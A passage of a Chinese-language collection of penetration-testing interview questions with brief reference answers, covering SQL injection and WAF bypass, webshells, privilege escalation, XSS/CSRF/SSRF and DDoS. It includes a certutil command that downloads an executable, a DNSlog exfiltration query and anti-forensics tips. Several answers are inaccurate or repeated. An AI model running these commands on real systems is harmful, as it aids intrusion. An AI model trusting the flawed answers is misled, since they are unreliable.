116 道网络安全工程师面试真题及参考答案

21(FTP), 22(SSH), 23(Telnet), 25(SMTP), 53(DNS), 80(HTTP), 135/139/445(SMB), 3306(MySQL), 3389(RDP) 等。

18. MySQL 注入点，用工具对目标站直接写入一句话，需要哪些条件？

需要数据库用户有 FILE 权限，且 secure_file_priv 配置允许写路径，通常需 root 权限。

19. 为何一个 MySQL 数据库的站，只有一个 80 端口开放？

出于安全考虑，数据库端口不应对外暴露，仅通过 Web 应用层访问，减少攻击面。

20. 如何突破注入时字符被转义？

利用双写绕过、宽字节注入、注释符替换、大小写混合、编码转换等方式。

21. SQL 注入的几种类型？

布尔盲注、时间盲注、报错注入、联合查询注入、堆叠注入、二次注入等。

22. 报错注入的函数有哪些？

MySQL: extractvalue, updatexml; MSSQL: error() 等。

23. 延时注入如何来判断？

通过 sleep() 或 waitfor delay 语句，观察响应时间是否显著增加。

24. 盲注和延时注入的共同点？

均无直接回显，依赖布尔逻辑或时间差来推断数据内容。

25. 注入时可以不使用 and 或 or 或 xor，直接 order by 开始注入吗？

可以，order by 常用于探测列数，无需逻辑运算符。

26. 如果网站 get 与 post 都做了防注入，还可以采用什么方式绕过？

尝试 PUT/DELETE 方法、HTTP 头注入、JSON 参数注入、XML 注入、URL 编码绕过。

27. 注入漏洞只能查账号密码？

否，可查询数据库名、表名、字段名、任意表数据、甚至执行系统命令（若权限允许）。

28. 如何利用这个防注入系统拿 shell？

寻找其他入口如文件上传、反序列化、命令执行漏洞，或利用注入点配合数据库写文件功能。

29. 发现 demo.jsp?uid=110 注入点，你有哪几种思路获取 webshell，哪种是优选？

思路：联合查询写文件、存储过程写文件、第三方工具。优选：联合查询写文件（若权限允许）。

30. SQLMap 怎么对一个注入点注入？

sqlmap -u "url" --dbs 或 --tables --columns --dump，配合--tamper 绕过 WAF。

31. 以下链接存在 SQL 注入漏洞，对于这个变形注入，你有什么思路？

分析 URL 结构，尝试闭合括号、注释符，或使用字符串拼接技巧绕过过滤。

32. SQL 注入写文件都有哪些函数？

INTO OUTFILE, INTO DUMPFILE, LOAD_FILE, UDF 提权等。

33. SQL 注入防护方法？

使用预编译语句（Prepared Statements）、输入验证、最小权限原则、WAF 防护。

34. 盲注 if 被过滤怎么绕过？

使用 case when、ifnull、substr、ascii 组合逻辑，或利用数据库特性替代。

35. 注入时，Waf 过滤了逗号，如何绕过？

使用 union select 代替 union all，或用 limit offset 代替 comma，或用括号分组。

36. MySQL 写 WebShell 有几种方式，利用条件？

INTO OUTFILE（需 file 权限）、UDF 提权后执行、phpmyadmin 后门。条件：数据库权限、路径可写。

37. SQL 注入无回显的情况下，利用 DNSlog，MySQL 下利用什么构造代码，MSSQL 下又如何？

MySQL: load_file(CONCAT('http://', @@hostname)) 或 dnslog 模块；MSSQL: xp_dirtree 或 openrowset 指向 DNS 域名。

38. phpmyadmin 写 shell 的方法

利用 phpMyAdmin 导入 SQL 文件功能，或在 config.inc.php 中配置后门。

39. 预编译能否 100% 防 SQL 注入，如果不能，写一个

不能，若动态表名或排序字段拼接仍可能注入。例如：ORDER BY ${sort}。

40. SQL 注入时当 and、or、单引号等字符被过滤了怎么办？

使用十六进制编码、ASCII 码、注释符（/**/）、空格替换（%09/%0a）。

41. 目前已知哪些版本的中间件有解析漏洞，具体举例

IIS 6.0 (解析 .asa/.cer), IIS 7.0+ (解析 .php/.txt), Apache (.htaccess), Nginx (fastcgi 配置错误)。

42. 拿到 webshell 发现网站根目录有.htaccess 文件，我们能做什么？

修改.htaccess 重写规则，将 .jpg 文件解析为 PHP，实现伪静态绕过。

43. 在某后台新闻编辑界面看到编辑器，应该先做什么？

检查编辑器是否支持 HTML 标签注入，尝试 XSS 或文件上传漏洞。

44. access 扫出后缀为 asp 的数据库文件，访问乱码，如何实现到本地利用？

下载数据库文件，使用 Access 查看器或专用工具（如 Access Viewer）打开提取数据。

45. 上传大马后访问乱码时，有哪些解决办法？

修改文件名后缀、使用 Base64 编码、调整编码格式、使用在线解码工具。

46. 审查上传点的元素有什么意义？

分析前端校验逻辑，判断是否可绕过，查看接口地址以便后续 Fuzz。

47. 目标站无防护，上传图片可以正常访问，上传脚本格式访问则 403.什么原因？

服务器配置限制了脚本执行权限，或 WAF 拦截了脚本扩展名。

48. 在 win2003 服务器中建立一个.zhongzi 文件夹用意何为？

可能是黑客留下的后门目录，用于存放恶意文件或作为跳板。

49. 如何找任意文件下载漏洞

寻找包含文件名的参数，尝试遍历常见路径（/etc/passwd, config.php），或修改参数值。

50. 常用中间件、数据库、第三方应用、操作系统默认配置文件是什么？

Tomcat (server.xml), MySQL (my.cnf), Windows (boot.ini/system.ini), Linux (/etc/passwd)。

51. 任意文件下载防范方法有那些？

限制文件扩展名、白名单机制、统一存储路径、不直接暴露文件路径。

52. img 标签除了 onerror 属性外，并且 src 属性的后缀名，必须以.jpg 结尾，怎么获取管理员路径

利用 JS 注入、XSS 存储型漏洞，或通过 CSS 加载远程资源获取路径。

53. CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？

CSRF（跨站请求伪造）：利用用户身份；XSS（跨站脚本）：注入脚本；XXE（实体注入）：读取本地文件。修复：Token 验证、输出编码、禁用外部实体。

54. CSRF、SSRF 和重放攻击有什么区别？

CSRF 伪造请求；SSRF 服务端请求内网；重放攻击 复制有效数据包重复发送。

55. 在有 shell 的情况下，如何使用 xss 实现对目标站的长久控制？

通过 XSS 窃取 Cookie 或 Token，维持会话；或植入持久化脚本。

56. XSS 平台用过吗？

（回答经验）常用 Xray、XSStrike 等工具辅助。

57. cors 如何产生，有哪些利用方式？绕过同源策略的方法有哪些？jsonp 跨域如何利用？

CORS 由服务端设置 Access-Control-Allow-Origin。利用：配置不当允许任意源。绕过：JSONP 回调劫持、CORS 预检绕过。

58. XSS 弹窗函数及常见的 XSS 绕过策略

alert(), document.cookie。绕过：标签过滤、事件过滤、编码混淆。

59. 如何防止 CSRF?

添加随机 Token、验证 Referer、SameSite Cookie 属性。

60. ssrf 怎么用 redis 写 shell

SSRF 访问 Redis 服务，写入 SSH Key 或 WebShell 到指定目录（需 Redis 可写且配置正确）。

61. 代码执行，文件读取，命令执行的函数都有哪些？

PHP: system(), exec(), eval(), include(); Java: Runtime.exec(); Python: os.system()。

62. struts2 框架漏洞原理

OGNL 表达式注入，导致远程代码执行。

63. JAVA 反序列化原理

对象序列化为字节流，反序列化时调用 readObject 执行危险方法，常涉及 CommonsCollections 等库。

64. 某服务器有站点 A,B 为何在 A 的后台添加 test 用户，访问 B 的后台，发现也添加上了 test 用户？

共用同一数据库或 Session/Cookie 作用域配置不当。

65. 目标站禁止注册用户，找回密码处随便输入用户名提示：'此用户不存在'，你觉得这里怎样利用？

用户名枚举漏洞，确认合法用户列表，进而进行撞库或社工。

66. 说出至少三种业务逻辑漏洞，以及修复方式？

越权访问（IDOR）、支付篡改、验证码爆破。修复：权限校验、金额校验、验证码强度。

67. 目标站禁止注册用户，找回密码处随便输入用户名提示：'此用户不存在'，你觉得这里怎样利用？

同上，用于用户枚举。

68. 要发现验证码的问题，你会从哪些角度去找，实际工作过程中发现过哪些验证码的问题

角度：是否可复用、是否可爆破、是否可绕过。问题：固定验证码、简单数学题、无刷新限制。

69. 渗透过程中如何找到 Waf、CDN 真实 IP

Ping 域名解析、历史 DNS 记录、SSL 证书信息、非标准端口扫描、TTL 分析。

70. 说说你渗透测试是如何社工的？

通过公开信息（社交媒体、简历）构建画像，发送钓鱼邮件或电话诱导提供凭证。

71. 你用过 APT 攻击软件吗，对这些软件熟吗？

了解 Cobalt Strike, Metasploit, Empire 等工具的原理和使用场景。

72. 代码安全测试方法

静态分析（SAST）、动态分析（DAST）、交互式分析（IAST）、人工审计。

73. 说说你是如何做代码审计的

阅读源码、关注输入输出点、追踪数据流、检查安全函数使用。

74. 描述一下代码审计工具的缺陷

误报率高、无法理解业务逻辑、难以发现深层逻辑漏洞。

75. 为什么要实施应用开发生命周期安全管理

为了在开发早期发现并修复漏洞，降低后期维护成本和安全风险。

76. 目前业界安全开发生命周期有那四大标准

OWASP SAMM, Microsoft SDL, BSIMM, NIST SSDF。

77. 简单描述一下微软 SDL 安全开发生命周期

包含培训、设计、开发、验证、发布、响应六个阶段的安全活动。

78. 说说 SQL 注入绕过方法

注释符、编码、双写、大小写、空字节、特殊字符替换。

79. 3389 无法连接的几种情况

防火墙拦截、服务未启动、IP 被封禁、端口映射错误。

80. 提权时选择可读写目录，为何尽量不用带空格的目录？

某些命令解析空格会导致参数截断，影响提权脚本执行。

81. 说一下 Windows 操作系统是如何提权的？

利用服务漏洞、内核漏洞、弱口令、计划任务、注册表项等。

82. 说一下 Linux 系统提权方法？

SUID 二进制、内核漏洞、 cron 任务、sudo 配置错误、内核模块。

83. 描述一下 MySQL 数据库提权方法？

UDF 提权、慢查询日志写 Shell、General Log 写 Shell。

84. udf 提权有什么限制条件？

需要 MySQL 运行在 Windows 环境，且拥有 SYSTEM 权限，lib_mysqludf_sys.dll 可上传。

85. 描述一下第三方应用软件提权方法？

利用软件本身的配置错误或已知漏洞，如 Jenkins、GitLab 等。

86. 说说你是如何做内网渗透的？

信息收集、横向移动（Pass-the-Hash）、域控攻击、权限维持。

87. xpcmdshell 禁用了有什么方法提权

利用其他存储过程、CLR 程序集、或者通过 OLE 对象执行命令。

88. 内网黄金票据、白银票据的区别和利用方式

黄金票据（Golden Ticket）：伪造 TGT，权限最高；白银票据（Silver Ticket）：伪造 ST，针对特定服务。利用：Kerberos 协议漏洞。

89. UDF 提权原理

加载自定义 DLL 到 MySQL 进程空间，执行系统命令。

90. Window、Linux 提权方式

见 81、82。

91. Windows cmd 如何下载文件

certutil -urlcache -split -f http://ip/file.exe

92. 隐藏攻击痕迹的方法？

清除 Event Logs、修改文件时间戳、使用 Rootkit、加密流量。

93. 1 台修改管理员密码处，原密码显示为*。你觉得该怎样实现读出这个用户的密码？

内存抓取、键盘记录、哈希破解、利用系统漏洞读取明文。

94. 审查元素得知网站所使用的防护软件，你觉得怎样做到的？

通过 HTTP 响应头（Server, X-Powered-By）、Cookie、JS 文件指纹识别。

95. 数据库备份怎么拿 webshell？

下载备份文件，恢复数据库，利用数据库写文件功能。

96. mysql 怎么拿 webshell？

利用 INTO OUTFILE 写 PHP 文件，或 UDF 提权。

97. 如何拿一个网站的 webshell（网站拿 shell 方法有哪些思路）？

文件上传、代码注入、漏洞利用、弱口令登录后台。

98. ARP 欺骗原理

伪造 ARP 响应包，将网关 MAC 地址指向攻击机，实现中间人攻击。

99. ARP 攻击分类

ARP 欺骗、ARP 泛洪、ARP 毒化。

100. ARP 防御方法

静态绑定 ARP、DAI（动态 ARP 检测）、监控异常流量。

101. 什么是 DOS 与 DDOS 攻击

DOS（拒绝服务）：单点攻击；DDoS（分布式拒绝服务）：多点协同攻击，旨在耗尽目标资源。

102. DDOS 攻击方式、目标、后果

方式：SYN Flood, UDP Flood, HTTP Flood。目标：带宽、CPU、连接数。后果：服务不可用。

103. DDOS 攻击分类

流量型、协议型、应用层。

104. SYN 攻击原理

发送大量 SYN 包但不完成三次握手，占用服务器半连接队列。

105. SYN 攻击后有什么特征

半连接队列满，新连接无法建立，服务器 CPU 升高。

106. 你是如何分析 DDOS 攻击的

流量分析、日志分析、特征匹配、溯源分析。

107. DDOS 如何防范

高防 IP、CDN 清洗、限流、黑名单、WAF。

108. owasp 漏洞都有哪些？

Top 10 包括注入、失效认证、敏感数据泄露、XXE、Broken Access Control、安全配置错误、XSS、反序列化、组件漏洞、日志不足。

109. 常见的网站服务器容器？

Apache, Nginx, IIS, Tomcat。

110. 什么是 fastjson,有哪些漏洞？

Java JSON 解析库。漏洞：反序列化 RCE（如 AutoType 绕过）。修复：升级版本，关闭 AutoType。

111. docker 远程 api 漏洞原理？

未授权访问 Docker API，可执行容器逃逸、宿主机命令执行。

112. 讲诉一些近期及有代表性的漏洞

Log4j2, Spring Cloud, Fastjson 等。

113. 讲诉 2020 年护网出现过那些 0day 漏洞

（根据公开资料回答）如各类框架漏洞、中间件漏洞。

114. Windows 系统中毒了，说说你的应急方法

断网、查杀病毒、修补漏洞、修改密码、恢复备份。

115. Linux 系统中毒了，说说你的应急方法

排查进程、网络连接、定时任务、日志分析、隔离主机。

116. 简单描述一下你在工作中遇到有意思的攻击溯源事件

（示例）通过分析攻击 IP 的 ASN 信息和流量特征，定位到攻击者位于某地区，并协助警方取证。

本文档整理自网络安全行业高频面试题，旨在帮助求职者系统复习核心知识点。